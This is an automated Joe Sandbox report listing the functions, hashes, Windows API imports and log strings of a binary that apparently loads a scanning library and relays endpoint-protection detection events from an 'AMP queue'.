Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FFE1320A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: 811884ade670e16a3f1d35e87278fc619aa27cec87588dbf54acea3412aba70e
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: 5051D922B08B8189FB20EB77A8441AE7BA4BB947A4F544274EE5D37AA5CE3CD405C700

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFE1320FD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2329741955.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2329729814.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329757317.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329771053.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2329783342.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_cajXRH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: b6d44495be9a203fe2c7ec73e1dbe77d54a4c1568e75fb48fff8d59d5bfafe36
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: F9F06271B196958EEBA49F29A942A2977D4E798390F948079D68D83B14D63C9060CF04

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

msi.dll, xrefs: 0000000140001042
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseInit, xrefs: 00000001400010FA
vseSet, xrefs: 0000000140001166
vseGlobalInit, xrefs: 00000001400010C8
vseRelease, xrefs: 0000000140001115
vseExec, xrefs: 0000000140001130
MsiLocateComponentW, xrefs: 0000000140001062
vseGet, xrefs: 000000014000114B
vseGlobalRelease, xrefs: 00000001400010DF

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000004.00000002.2329670757.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2329653456.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329702657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2329716147.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_cajXRH.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
